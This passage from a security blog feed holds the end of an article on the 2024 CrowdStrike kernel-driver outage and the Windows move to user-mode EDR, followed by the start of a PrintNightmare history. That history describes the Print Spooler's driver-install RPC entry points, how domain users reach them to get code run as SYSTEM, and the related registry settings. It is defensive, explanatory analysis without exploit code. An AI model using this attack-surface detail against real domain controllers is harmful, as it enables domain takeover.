&lt;li&gt;Engineer your content delivery pipeline as if the platform will eventually require ring-based staged deployment under contractual gating. The MVI 3.0 deployment-ring requirements are the model: internal ring, canary ring, GA ring, with monitored promotion gates between each [@weston-2025-06-26]. Build the pipeline now even if the contractual requirement does not yet bind you, because the alternative is rebuilding it under emergency pressure later.&lt;/li&gt;
&lt;li&gt;For BYOVD coverage and rootkit visibility you cannot get from user mode, design around platform features rather than rebuilding them yourself. The Vulnerable Driver Block List, HVCI, Secured-core PC, Pluton, and Defender&apos;s baseline are platform-curated controls; layer your detection coverage on top of them rather than parallel to them [@mslearn-driver-block-rules, @mslearn-hvci, @cisa-cm0058].&lt;/li&gt;
&lt;li&gt;Treat the Apple ESF deployment as your reference implementation. Your macOS-side ESF migration -- which most major Windows EDR vendors completed between 2019 and 2024 -- is the closest analogue to the Windows-side migration you are now starting. The architectural lessons transfer; do not repeat the early-ESF mistakes on the Windows side.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;For the incident responder&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;The on-disk artifacts from the July 19 outage -- &lt;code&gt;C-00000291*.sys&lt;/code&gt; channel files, the minidumps with &lt;code&gt;csagent.sys+0x...&lt;/code&gt; frames -- are the canonical reference set for &quot;vendor-content-update-bug-checks-kernel-driver&quot; investigations [@ms-secblog-2024-07-27]. Treat any future &quot;vendor module + &lt;code&gt;nt!KiPageFault&lt;/code&gt; + unmapped address&quot; stack as structurally analogous and apply the same runbook posture.&lt;/li&gt;
&lt;li&gt;The next analogous incident will look the same in the dumps. The faulting module name will be different; the offset will be different; the unmapped address will be different. The pattern -- vendor kernel module, page fault from &lt;code&gt;nt!KiPageFault&lt;/code&gt;, unmapped read address in the high half of the canonical address space, &lt;code&gt;PAGE_FAULT_IN_NONPAGED_AREA&lt;/code&gt; -- will be identical.&lt;/li&gt;
&lt;li&gt;Build playbooks now for &quot;vendor content update reverted but on-disk-persisted&quot; scenarios. QMR is the platform answer [@mslearn-qmr], but your runbook is what gets your fleet through the first hour before a Microsoft-provided recovery flow is appropriate. The first-hour runbook for July 19, 2024 was &quot;safe-mode boot, delete the file, reboot,&quot; and it is worth having that runbook in your incident playbook today for the next analogous event.&lt;/li&gt;
&lt;li&gt;Document your AV/EDR vendor&apos;s incident-response point of contact and their SLA. The July 19 morning was characterized by &lt;em&gt;vendor-side&lt;/em&gt; communication latency in the first hour, not by lack of platform recovery options. Pre-staging the vendor&apos;s IR contact and your fleet-wide content-revert process will compress your time-to-mitigation by orders of magnitude.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;A cross-platform reality check&lt;/h3&gt;
&lt;p&gt;A practitioner moving from macOS to Windows in 2026 will find that macOS gave them one architecture (Method C since 2019), Linux gave them one architecture in the opposite direction (eBPF dominant), and Windows is the &lt;em&gt;transitional&lt;/em&gt; platform where Methods A, B, C, D, E, and F all coexist in different states of deployment. The architectural choice on Windows in 2026 is not &quot;which method&quot;; it is &quot;which combination, and how to migrate from your current combination to your target combination.&quot; That is the bridge-year reality, and it will be the bridge-year reality through at least the late 2020s.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Mid-2026 is the bridge year. Your job is to design for the bridge, not for either bank.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;11. Common Misconceptions&lt;/h2&gt;
&lt;p&gt;Six questions a careful reader will already have answered for themselves, restated here for the reader who arrived at this section via the table of contents.&lt;/p&gt;

No. Microsoft Windows behaved exactly as the kernel-driver architecture requires it to behave when a third-party kernel driver faults at elevated IRQL: the kernel had no way to recover, so it stopped. The bug was in CrowdStrike&apos;s `csagent.sys` driver consuming a malformed CrowdStrike Channel File. Microsoft&apos;s own July 27, 2024 security blog is unambiguous about this: the WinDBG walkthrough names `csagent.sys` as the faulting image and `nt!KiPageFault+0x369` as the kernel handler that received the fault [@ms-secblog-2024-07-27]. The architectural responsibility for the post-outage migration sits with Microsoft as the platform owner, but the proximate technical cause was a third-party kernel driver consuming a third-party content file [@cs-rca-2024-08-06].

Not necessarily. The user-mode EDR architecture closes the *reliability* problem -- a Channel-File-291-class bug in a vendor&apos;s content pipeline crashes the vendor&apos;s user-mode process, not the kernel. For the *coverage* gaps that user-mode loses on its own (direct syscalls, rootkit visibility, BYOVD detection), Microsoft is layering platform features below the user-mode EDR: hypervisor-assisted introspection via VBS and HVCI [@mslearn-hvci], the Vulnerable Driver Block List for BYOVD [@mslearn-driver-block-rules, @cisa-cm0058], and Defender as the baseline detection floor. Whether the combined stack reaches coverage equivalence with today&apos;s kernel-callback EDR is the article&apos;s central open question and the honest mid-2026 answer is that it is not yet settled [@weston-2025-06-26, @ms-nov-2025].

The strongest available public signal as of mid-2026 is the November 18, 2025 Microsoft Windows Experience Blog framing that *&quot;AV enforcement&quot;* (not *&quot;third-party AV enforcement&quot;*) is shifting from kernel to user mode -- by plain reading, that includes Defender for Endpoint [@ms-nov-2025]. No Defender-specific GA date for the user-mode migration has been published. The same November 18 post explicitly carves out graphics drivers, which continue to ship in kernel mode for performance reasons -- so the WRI is, narrowly, an AV-enforcement migration and not a wholesale third-party kernel-driver lockout [@ms-nov-2025].

Probably elevated, but no public primary source establishes the specific IRQL value. The article says only that the fault occurred at an interrupt request level high enough that the kernel could not unwind to a structured exception handler in any meaningful way. Treat any IRQL-specific claim about Channel File 291 from a third-party source as speculation unless they cite a primary source that publishes the value. Microsoft&apos;s own July 27, 2024 post-mortem reproduces the WinDBG dump but does not publish the IRQL value at the moment of the fault [@ms-secblog-2024-07-27]; neither does CrowdStrike&apos;s August 6, 2024 Root Cause Analysis [@cs-rca-2024-08-06].

No. The Microsoft response is squarely a U.S.-side platform-stewardship response to a U.S.-litigated incident. European regulatory frameworks were part of the policy backdrop, and U.S. federal frameworks (Government Accountability Office, Congressional Research Service, House Homeland Security Subcommittee) shaped the political environment [@gao-24-107733, @crs-if12717-everycrsreport, @homeland-hearing-page, @govinfo-chrg-118hhrg60030]. But the proximate political cause was the operational loss of 8.5 million Windows hosts and the Congressional accountability event that followed; no regulatory body mandated the WRI&apos;s specific architectural choices.

Architecturally it is not different in any structural way. Both were vendor content updates that caused vendor kernel drivers to misbehave at fleet scale. McAfee DAT 5958 was a false positive on `svchost.exe` that triggered the McAfee kernel driver to quarantine the system file, putting Windows XP SP3 fleets into reboot loops [@uscert-mcafee-2010, @sans-isc-8656, @askperf-mcafee]. CrowdStrike Channel File 291 was a parameter-count mismatch that triggered the CrowdStrike kernel driver to dereference an unmapped address, producing `PAGE_FAULT_IN_NONPAGED_AREA` [@cs-rca-2024-08-06]. The differences were the *scale* of the 2024 event (8.5 million Windows hosts versus a far smaller XP fleet in 2010) and the *cost calculus* -- by 2024, fourteen years of recurring kernel-driver-bricks-fleet incidents had raised the political cost of doing nothing past the point where Microsoft could be politically attacked for taking action [@three-buddy-ep5].
&lt;p&gt;The seventy-eight-minute window of July 19, 2024 collapsed twenty years of political resistance to the Vista-era idea that vendor-authored kernel-mode code is a fleet-scale reliability liability, and accelerated Microsoft&apos;s Windows Resiliency Initiative into a multi-year, partner-coordinated migration that puts third-party endpoint security where Apple put it in 2019 [@apple-esf-docs] and where Microsoft itself had been quietly building the platform pieces since at least 2021 [@msft-ebpf-windows, @mslearn-hvci]. The 8.5 million figure from Brad Smith&apos;s morning-after blog post [@ms-bradsmith-2024-07-20] is the empirical anchor that supplied the political license; the Toulouse 2006 quote &lt;em&gt;&quot;either everybody has access to the kernel, or nobody does&quot;&lt;/em&gt; [@informationweek-2006-toulouse] is the historical anchor that supplied the architectural answer; the Ionescu pivot of April 3, 2025 [@cs-ionescu-ctio-2025-04-03] is the political anchor that demonstrated the answer would not be fought.&lt;/p&gt;
&lt;p&gt;Whether user-mode EDR with hypervisor-assisted memory introspection can deliver the coverage equivalence that twenty-five years of kernel-mode hooking has built is the next decade&apos;s research problem, and the honest mid-2026 answer is &lt;em&gt;we do not yet know&lt;/em&gt;. The macOS seven-year ESF deployment supplies the strongest available &lt;em&gt;yes&lt;/em&gt; evidence; the not-yet-stress-tested MVI 3.0 rings supply the strongest available &lt;em&gt;not-yet-discriminated&lt;/em&gt; evidence; the BYOVD enforcement gap that no public source quantifies supplies the strongest available &lt;em&gt;honest concern&lt;/em&gt; [@cisa-cm0058].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; July 19, 2024 did not invent the architecture; it provided the political license for an architecture two other operating systems had already validated. The next several years will tell us whether the architecture, transplanted to Windows under the WRI, reaches feature equivalence with the kernel-mode hooking it replaces, or whether the equivalence question is the wrong question and the right question is whether the platform features layered below the user-mode broker close enough of the coverage gap. The honest answer mid-2026 is that the question is genuinely open, and the next public evidence -- the first MVI 3.0 ring stop-gate event, the first Defender-kernel-out GA, the first quantified HVCI enablement statistic -- is the evidence to watch for.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Companion articles in this series cover the substrate pieces in more depth: EDR/Sysmon as the canonical user-mode consumer of kernel ETW telemetry [@mslearn-sysmon]; Vulnerable Driver Block List as Microsoft&apos;s BYOVD platform mitigation; Process Mitigation Policies and Defender for Endpoint baselines; and Event Tracing for Windows as the cross-cutting platform observability substrate.&lt;/p&gt;
&lt;p&gt;Picture the release engineer at the CrowdStrike Falcon Cloud rollout console at 04:09 UTC on a Friday morning in July 2024, watching the deployment indicator go from staging to production for Channel File 291, with no idea that the seventy-eight-minute window about to open would be the most consequential window in twenty-five years of Windows security architecture. The engineer did everything right; the architecture, on that morning, did exactly what twenty-five years of decisions had configured it to do; and the next two years of Microsoft platform engineering, vendor-side rewrites, and political alignment exist to make sure that the next time something similar happens, it does not look like that.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;seventy-eight-minutes-evicted-antivirus-windows-kernel&quot; keyTerms={[
  { term: &quot;PAGE_FAULT_IN_NONPAGED_AREA&quot;, definition: &quot;Windows bug check 0x50, raised when kernel-mode code reads or writes a virtual address with no valid mapping in the page tables.&quot; },
  { term: &quot;Content Interpreter&quot;, definition: &quot;CrowdStrike terminology for the in-kernel csagent.sys subsystem that parses Rapid Response Content channel files at runtime against the Template Type schema declared in the sensor binary.&quot; },
  { term: &quot;Microsoft Virus Initiative (MVI) 3.0&quot;, definition: &quot;The April 1, 2025-effective revision of the MVI program that adds Safe Deployment Practices, deployment rings, monitored rollouts, and incident-response testing as contractual requirements for Windows AV partners.&quot; },
  { term: &quot;Windows endpoint security platform&quot;, definition: &quot;Microsoft&apos;s descriptive phrase for the user-mode API surface that lets third-party EDR products subscribe to kernel-curated security telemetry without loading their own kernel driver; in private preview to MVI 3.0 partners since July 2025.&quot; },
  { term: &quot;Quick Machine Recovery (QMR)&quot;, definition: &quot;Windows 11 24H2-era platform-level remote-remediation flow, managed via the RemoteRemediation CSP, that can boot a failing Windows host into a recovery environment and apply targeted fixes without manual safe-mode intervention.&quot; }
]} flashcards={[
  { front: &quot;What was the faulting address inside csagent.sys on July 19, 2024, per Microsoft&apos;s July 27 secblog?&quot;, back: &quot;0xffff840500000074 -- an unmapped kernel virtual address; the read fired PAGE_FAULT_IN_NONPAGED_AREA.&quot; },
  { front: &quot;How long did the seventy-eight-minute window run?&quot;, back: &quot;From 04:09 UTC push to 05:27 UTC revert; 78 minutes, with persistence-across-reboot pathology after the revert.&quot; },
  { front: &quot;Name the three architectural answers to where the third-party security observer runs.&quot;, back: &quot;(1) User mode subscribing via platform broker (Apple ESF, Windows endpoint security platform). (2) Kernel mode, verifier-bounded extension (Linux eBPF, eBPF for Windows). (3) Hypervisor, below the guest kernel (Bitdefender HVI, Microsoft VBS/HVCI/Secure Kernel).&quot; }
]} questions={[
  { q: &quot;Why did the kernel context of csagent.sys make the Channel File 291 bug catastrophic, when the same general bug in a user-mode parser would only have crashed the parser process?&quot;, a: &quot;Because a fault in a user-mode process is recoverable by the operating system, while a fault in a kernel driver at elevated IRQL forces the kernel to bug-check the entire system. The bug itself (out-of-bounds read from a parameter array) is mundane; the kernel context made it catastrophic.&quot; },
  { q: &quot;What did the Windows Resiliency Initiative commit to in November 2024 that did not exist before September 2024?&quot;, a: &quot;A named, branded multi-year program (the WRI) with four pillars, including a public commitment to deliver a private preview of user-mode EDR APIs to MVI partners in July 2025. The September 12, 2024 Weston post had committed to the architectural direction; the November 19, 2024 Ignite post committed to the named program and the dated milestones.&quot; },
  { q: &quot;What is the honest mid-2026 answer to the user-mode EDR coverage-equivalence question?&quot;, a: &quot;We do not yet know. The Apple ESF seven-year deployment supplies positive evidence that equivalence is reachable; the not-yet-stress-tested MVI 3.0 rings and the unquantified BYOVD enforcement gap supply honest concerns. The right epistemic posture is to keep watching.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>edr</category><category>crowdstrike</category><category>kernel-mode</category><category>incident-analysis</category><category>microsoft-virus-initiative</category><category>endpoint-security</category><category>reliability</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Three Years of PrintNightmare: How the Oldest Windows Service Survived Four Patch Waves</title><link>https://paragmali.com/blog/three-years-of-printnightmare-how-the-oldest-windows-service/</link><guid isPermaLink="true">https://paragmali.com/blog/three-years-of-printnightmare-how-the-oldest-windows-service/</guid><description>How the Windows Print Spooler produced nine SYSTEM-execution primitives in 2010-2024 and why Microsoft answered with two parallel architectures, not one.</description><pubDate>Tue, 02 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Between June 2021 and August 2024, Microsoft patched the Windows Print Spooler four times for what the press collectively called PrintNightmare. The patches did not converge. Each wave revealed the last one as a behavior restriction rather than an architectural change. By October 2024 Microsoft had shipped two parallel architectural answers: Windows Protected Print Mode (WPP), an opt-in driverless local stack with a lower-privilege Spooler Worker process; and Universal Print, a cloud-hosted replacement. Two answers, because the local SYSTEM-context driver-loading primitive the spooler was built around in the early 1990s cannot be sandboxed without breaking the printer install base that depends on it. This article traces nine related Spooler EoP and RCE primitives from 2010 to 2024, the architectural concession that ended the patch cycle, and why no single 2026 configuration is the full answer.
&lt;h2&gt;1. June 29, 2021: The Repository That Should Not Have Existed&lt;/h2&gt;
&lt;p&gt;On June 29, 2021, three researchers from Sangfor Technology -- Zhiniang Peng, Xuefeng Li, and Lewis Lee -- pushed a GitHub repository named &lt;code&gt;afwu/PrintNightmare&lt;/code&gt; containing a working proof-of-concept exploit against the Windows Print Spooler service. The repository had been prepared for their upcoming Black Hat USA 2021 briefing, &quot;Diving Into Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer&quot; [@infocondb-bh2021-sangfor]. The team believed Microsoft&apos;s June 8 Patch Tuesday update had fixed the vulnerability they were about to demonstrate.&lt;/p&gt;
&lt;p&gt;Within hours the repository was deleted. By then it had already been mirrored on multiple GitHub accounts and was spreading [@hackernews-printnightmare-poc-leak]. By the end of the day, the internet had a new name for the bug class: PrintNightmare. And by the end of the week, Microsoft, CERT/CC, and CISA had each independently confirmed what the Sangfor team realized about an hour after the deletion: the June 8 patch did not actually fix the vulnerability they had reported, and now the world had a working exploit for it [@cert-vu-383432] [@bleepingcomputer-domain-takeover].&lt;/p&gt;
&lt;p&gt;The Wayback Machine preserves the original README. Below the technical description, the Sangfor team explained why they had thought it was safe to publish: Microsoft&apos;s June 8 advisory had marked CVE-2021-1675 as a local &quot;Privilege Escalation&quot; with a CVSS v3.1 base score of 7.8 [@nvd-cve-2021-1675]. The bug Sangfor had separately reported and analyzed was, they believed, a different bug -- a remote code execution against the same service. They were correct. Nobody knew it yet.Microsoft silently reclassified CVE-2021-1675 from &quot;Elevation of Privilege&quot; to &quot;Remote Code Execution&quot; on June 21, 2021, after community analysis demonstrated the remote primitive. The reclassification appears in the NVD entry&apos;s revision history [@nvd-cve-2021-1675] and was reported the same week by BleepingComputer [@bleepingcomputer-domain-takeover]. The Sangfor team&apos;s confusion was reasonable: the advisory they were reading on June 28 still said EoP.&lt;/p&gt;
&lt;p&gt;The README&apos;s most striking line is an apology. &quot;CVE-2021-1675 is a remote code execution in Windows Print Spooler,&quot; it begins. Then, two paragraphs in: &quot;We also found this bug before and hope to keep it secret to participate Tianfu Cup&quot; [@afwu-wayback-snapshot]. The Sangfor team had discovered the same primitive months earlier, planned to use it for the Tianfu Cup capture-the-flag prize money, and reasoned that Microsoft&apos;s June 8 patch had now closed it.The Tianfu Cup is a Chinese-government-organized exploit competition. Chinese researchers are restricted from foreign competitions like Pwn2Own by a 2018 directive and instead route their work through Tianfu. Holding a bug secret to maximize Tianfu prize money is a known practice; what is unusual here is the public admission of the practice in an apology README.&lt;/p&gt;
&lt;p&gt;The rest of this article is about two questions. First: why does a single Windows service produce, on the public record, nine independently classed SYSTEM-code-execution primitives across fifteen years? Second: why does the answer Microsoft eventually shipped in 2024 take the form of two parallel architectures rather than one patch? We will not tell you which configuration to deploy. We will tell you why neither one alone is the full answer, and why that is the only honest place to land.&lt;/p&gt;
&lt;p&gt;To understand why one Windows service can leak a SYSTEM-execution primitive to anyone who can reach an RPC named pipe on a domain controller, we have to understand what the service is for.&lt;/p&gt;
&lt;h2&gt;2. The Artifact: What &lt;code&gt;spoolsv.exe&lt;/code&gt; Is and Why It Was Built This Way&lt;/h2&gt;
&lt;p&gt;The Windows Print Spooler service has been part of Windows continuously since the Windows NT era of the early 1990s.The &quot;Windows NT 3.1, July 1993&quot; attribution often cited for the first Print Spooler service is folk knowledge. Microsoft&apos;s own Learn documentation anchors the spooler architecture to &quot;Microsoft Windows 2000 and later&quot; [@ms-print-spooler-architecture], and the Windows Internals team writes that the spooler is &quot;largely unchanged since Windows NT 4&quot; [@windows-internals-printdemon]. The early-1990s framing is the safe one. Same name today (&lt;code&gt;spoolsv.exe&lt;/code&gt;), same security context (LocalSystem), same RPC interface family, same in-process third-party DLLs (Print Providers, Print Processors, driver components). The interesting question is not why the spooler still has bugs. It is why a service designed before &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt;, before &lt;a href=&quot;https://paragmali.com/blog/the-integrity-level-stack-mic-uipi-and-twenty-years-of-uacs-/&quot; rel=&quot;noopener&quot;&gt;Mandatory Integrity Control&lt;/a&gt;, before &lt;a href=&quot;https://paragmali.com/blog/amsi-the-pre-execution-window-defender/&quot; rel=&quot;noopener&quot;&gt;AMSI&lt;/a&gt;, before &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;Driver Signature Enforcement&lt;/a&gt; -- before the entire modern Windows security architecture existed -- still occupies the same SYSTEM-context process slot it did in 1996.&lt;/p&gt;
&lt;h3&gt;2.1 Anatomy&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;spoolsv.exe&lt;/code&gt; is, in Microsoft&apos;s own words, &quot;the spooler&apos;s API server&quot; [@ms-intro-spooler-components]. The Service Control Manager starts it at boot under the LocalSystem account. Inside the process, the router DLL &lt;code&gt;spoolss.dll&lt;/code&gt; dispatches incoming API calls to one of three Print Provider DLLs [@ms-print-spooler-architecture].&lt;/p&gt;

The Windows service that mediates between print clients and printer drivers. It runs continuously as LocalSystem, exposes an RPC interface over the `\PIPE\spoolss` named pipe, and loads third-party Print Provider, Print Processor, and printer driver DLLs into its address space [@ms-intro-spooler-components]. Almost every named Print Spooler vulnerability since 2010 has cashed out as SYSTEM-context code execution inside this process.
&lt;p&gt;The three Print Providers handle three kinds of printer connections. The Local Print Provider &lt;code&gt;localspl.dll&lt;/code&gt; handles printers attached or shared on the local machine. The Remote Print Provider &lt;code&gt;win32spl.dll&lt;/code&gt; handles printers reached via Windows networking. The HTTP / IPP Print Provider &lt;code&gt;inetpp.dll&lt;/code&gt; handles printers exposed over the Internet Printing Protocol [@ms-print-spooler-architecture] [@ms-intro-spooler-components].&lt;/p&gt;

The three router-loaded DLLs that dispatch print operations to the appropriate transport. `localspl.dll` (Local Print Provider) handles local and SMB-shared printers; `win32spl.dll` (Remote Print Provider) handles Windows-network remote printers; `inetpp.dll` (HTTP / IPP Print Provider) handles IPP printers reached over HTTP [@ms-print-spooler-architecture]. The chain is often confused with the Print Processor layer (a different layer entirely; see below).
&lt;p&gt;Once a print job is accepted, a separate component decides how to render it. That component is the Print Processor. The default Print Processor is &lt;code&gt;winprint.dll&lt;/code&gt;. It is a sibling layer to the Print Providers, not a member of the chain.&lt;/p&gt;

The component that interprets the spool file format (EMF, XPS, RAW, TEXT) and renders pages for a specific printer. `winprint.dll` is the default Print Processor that ships with Windows. Vendor-supplied Print Processors can be installed alongside it. A common pre-research misclassification names `winprint.dll` as a Print Provider; it is not. The Print Providers handle which printer; the Print Processor handles how to render the page [@ms-print-spooler-architecture].
&lt;p&gt;Clients of &lt;code&gt;spoolsv.exe&lt;/code&gt; are &lt;code&gt;winspool.drv&lt;/code&gt; locally and &lt;code&gt;win32spl.dll&lt;/code&gt; remotely [@ms-intro-spooler-components]. A user-mode application that calls a Win32 print API (&lt;code&gt;OpenPrinter&lt;/code&gt;, &lt;code&gt;EnumPrinters&lt;/code&gt;, &lt;code&gt;AddPrinter&lt;/code&gt;, &lt;code&gt;AddPrinterDriverEx&lt;/code&gt;) is, under the covers, sending an RPC request to &lt;code&gt;spoolsv.exe&lt;/code&gt; through one of these client libraries.&lt;/p&gt;

flowchart TD
    SCM[&quot;Service Control Manager&quot;] --&amp;gt; SPOOLSV[&quot;spoolsv.exe&lt;br /&gt;LocalSystem&quot;]
    SPOOLSV --&amp;gt; ROUTER[&quot;spoolss.dll&lt;br /&gt;(router)&quot;]
    ROUTER --&amp;gt; LOCALSPL[&quot;localspl.dll&lt;br /&gt;Local Print Provider&quot;]
    ROUTER --&amp;gt; WIN32SPL[&quot;win32spl.dll&lt;br /&gt;Remote Print Provider&quot;]
    ROUTER --&amp;gt; INETPP[&quot;inetpp.dll&lt;br /&gt;HTTP / IPP Print Provider&quot;]
    ROUTER --&amp;gt; WINPRINT[&quot;winprint.dll&lt;br /&gt;Print Processor&quot;]
    PIPE[&quot;\PIPE\spoolss&lt;br /&gt;(named pipe / ncacn_np)&quot;] --&amp;gt; SPOOLSV
    WINSPOOL[&quot;winspool.drv&lt;br /&gt;local clients&quot;] --&amp;gt; PIPE
    REMOTE[&quot;win32spl.dll&lt;br /&gt;remote clients&quot;] --&amp;gt; PIPE
    SPOOLSV -. opt-in INF .-&amp;gt; PIH[&quot;PrintIsolationHost.exe&lt;br /&gt;(sibling, LocalSystem)&quot;]
    PIH --&amp;gt; VDRIVER[&quot;vendor driver DLLs&quot;]
&lt;h3&gt;2.2 The RPC Surface&lt;/h3&gt;
&lt;p&gt;The Print Spooler exposes two RPC interface families. MS-RPRN is the synchronous Print System Remote Protocol. MS-PAR is its asynchronous counterpart. Both bind to the same named pipe.&lt;/p&gt;

Microsoft&apos;s two open-specification RPC protocols for remote print management. MS-RPRN is synchronous; MS-PAR is asynchronous. The MS-RPRN specification states that &quot;The RPC Protocol Sequence MUST be `ncacn_np`. The RPC Protocol Sequence Endpoint MUST be `\PIPE\spoolss`&quot; [@ms-rprn-spec]. Both interfaces expose driver-installation entry points: `RpcAddPrinterDriverEx` in MS-RPRN [@ms-rprn-rpcaddprinterdriverex] and `RpcAsyncAddPrinterDriver` in MS-PAR [@ms-par-rpcasyncaddprinterdriver]. MS-PAR&apos;s documentation states verbatim that the latter is &quot;The counterpart of this method in the Print System Remote Protocol.&quot;
&lt;p&gt;Two symmetric entry points are the architectural seed of the entire PrintNightmare patch tree. &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; (MS-RPRN section 3.1.4.4.8, Opnum 89) &quot;installs a printer driver on the print server&quot; [@ms-rprn-rpcaddprinterdriverex]. &lt;code&gt;RpcAsyncAddPrinterDriver&lt;/code&gt; (MS-PAR section 3.1.4.1, Opnum 39) does the same thing through the asynchronous interface [@ms-par-rpcasyncaddprinterdriver]. When the June 8, 2021 patch tightened access checks on the first entry point, the second one remained as the obvious next bypass target. We will come back to this.&lt;/p&gt;
&lt;p&gt;The authentication boundary is the part most worth dwelling on, because the answer is structurally surprising. &lt;strong&gt;MS-RPRN does no authentication at the protocol layer.&lt;/strong&gt; The MS-RPRN Transport section states this verbatim: &quot;The client MUST use no authentication, and the server MUST accept connections without authentication&quot; [@ms-rprn-transport]. The initialization section adds that the binding handle &quot;MUST specify an &lt;code&gt;ImpersonationLevel&lt;/code&gt; of 2 (Impersonation)&quot; against the SMB2 transport [@ms-rprn-initialization]. The RPC layer trusts whatever caller identity SMB hands it.&lt;/p&gt;
&lt;p&gt;This means the practical authentication boundary on &lt;code&gt;\PIPE\spoolss&lt;/code&gt; is the SMB named-pipe access control surface, not the RPC server. Two security policy settings govern that surface. The first, &lt;strong&gt;Network access: Restrict anonymous access to Named Pipes and Shares&lt;/strong&gt; (the &lt;code&gt;RestrictNullSessAccess&lt;/code&gt; registry value under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters&lt;/code&gt;), has shipped at value &lt;code&gt;1&lt;/code&gt; -- enforced -- by default since Windows Vista; its effective default is &quot;Enabled&quot; on stand-alone servers, domain controllers, member servers, and client computers [@ms-restrict-anonymous-named-pipes]. The second, &lt;strong&gt;Network access: Named Pipes that can be accessed anonymously&lt;/strong&gt; (the &lt;code&gt;NullSessionPipes&lt;/code&gt; list), enumerates the small set of pipes that an unauthenticated caller is allowed to touch even when the first policy is enforced. &lt;code&gt;spoolss&lt;/code&gt; is &lt;strong&gt;not&lt;/strong&gt; on the default &lt;code&gt;NullSessionPipes&lt;/code&gt; list [@ms-named-pipes-anonymous].The combination of these two settings is what makes a default modern Windows host immune to anonymous-SMB reachability of &lt;code&gt;\PIPE\spoolss&lt;/code&gt;. The MS-RPRN spec&apos;s &quot;MUST use no authentication&quot; sentence [@ms-rprn-transport] reads like a security failure in isolation; combined with &lt;code&gt;RestrictNullSessAccess=1&lt;/code&gt; and the absence of &lt;code&gt;spoolss&lt;/code&gt; from &lt;code&gt;NullSessionPipes&lt;/code&gt; [@ms-restrict-anonymous-named-pipes] [@ms-named-pipes-anonymous], it becomes a deliberate division of labour: RPC does not authenticate; SMB does. The architectural cost is that the boundary is administered through two settings on a different policy surface than the spooler itself.&lt;/p&gt;
&lt;p&gt;On a default Windows 11 24H2 host with the Print Spooler running, then: an unauthenticated remote attacker on the network cannot reach &lt;code&gt;\PIPE\spoolss&lt;/code&gt;. A &lt;em&gt;domain&lt;/em&gt; user authenticated to the same Active Directory forest can. That is the practical reachability boundary that CERT/CC and CISA had in mind when they called PrintNightmare a &quot;domain takeover&quot; primitive [@bleepingcomputer-domain-takeover] [@cisa-ed-21-04]: any domain user reaches the spooler on a domain controller; the spooler executes attacker-supplied code as LocalSystem; that LocalSystem code now runs on a host that owns the domain. The &quot;domain user can reach it&quot; half is true because SMB authenticates the user and the RPC layer accepts whatever SMB says; the &quot;executes attacker-supplied code as LocalSystem&quot; half is the architectural primitive section 2.3 will name.&lt;/p&gt;
&lt;h3&gt;2.3 The Back-Compat Constraint&lt;/h3&gt;
&lt;p&gt;Why has the architecture not been replaced? Because essentially every Windows-compatible printer manufactured since 1993 ships a third-party driver DLL that expects to be loaded into &lt;code&gt;spoolsv.exe&lt;/code&gt; as LocalSystem.&lt;/p&gt;
&lt;p&gt;The v3 driver model -- introduced with Windows 2000 -- loads driver render code into the spooler process by default [@ms-print-spooler-architecture]. The v4 driver model, introduced with Windows 8, was a simpler XPS-based alternative meant to package drivers in a way that worked across multiple Windows form factors [@ms-print-spooler-architecture]. It did not replace v3. The two coexisted for more than a decade. The IPP class driver [@ms-modern-print-platform], which lets Windows print to any Mopria-certified printer without any vendor-specific driver at all, was not even an option for the first twenty years of the spooler&apos;s life [@mopria-certified-products].&lt;/p&gt;
&lt;p&gt;What this means in practice: the installed base of printers in 2021 was overwhelmingly v3 drivers, signed by vendors, packaged for LocalSystem load. A naive &quot;sandbox the spooler&quot; change that broke that loading model would break printing for every one of those printers. Microsoft has spent twenty years trying not to make printing not work. That constraint is the protagonist of the rest of the article.&lt;/p&gt;
&lt;h3&gt;2.4 Point and Print and Why It Is Its Own Constraint&lt;/h3&gt;
&lt;p&gt;Point and Print is the SMB-fetch-and-install-driver-on-print behavior introduced with Windows NT 4.0. When a client first prints to a shared printer, the spooler downloads the driver package from the print server and installs it locally. The user does not have to be an administrator.&lt;/p&gt;

A Windows print-client behavior in which a non-administrator user, on first use of a shared printer, causes their machine&apos;s spooler to download and install the printer&apos;s driver package from the print server. Two Group Policy registry values govern whether the user is warned and whether elevation is suppressed: `NoWarningNoElevationOnInstall` (suppress install-time elevation) and `NoWarningNoElevationOnUpdate` (suppress update-time elevation) [@kb-5005010-topic] [@kb-5005652-topic]. The Microsoft-supplied &quot;fix&quot; to this design surface is a third registry value, `RestrictDriverInstallationToAdministrators`, which overrides both.
&lt;p&gt;Bake &quot;any authenticated user can cause a driver DLL to be downloaded and registered&quot; into a protocol and you have, by construction, a low-privilege code-installation path. The two relevant Group Policy levers (&lt;code&gt;NoWarningNoElevationOnInstall&lt;/code&gt; and &lt;code&gt;NoWarningNoElevationOnUpdate&lt;/code&gt;) and the registry override (&lt;code&gt;RestrictDriverInstallationToAdministrators&lt;/code&gt;) all existed before PrintNightmare. All three defaulted to the permissive position. The June 2021 disclosure made the permissive defaults visible.&lt;/p&gt;
&lt;blockquote&gt;
